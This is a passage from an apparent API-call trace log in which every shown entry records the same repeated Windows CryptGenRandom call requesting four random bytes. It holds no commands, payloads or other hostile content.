pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.466] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.467] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.472] CryptGenRandom (in: 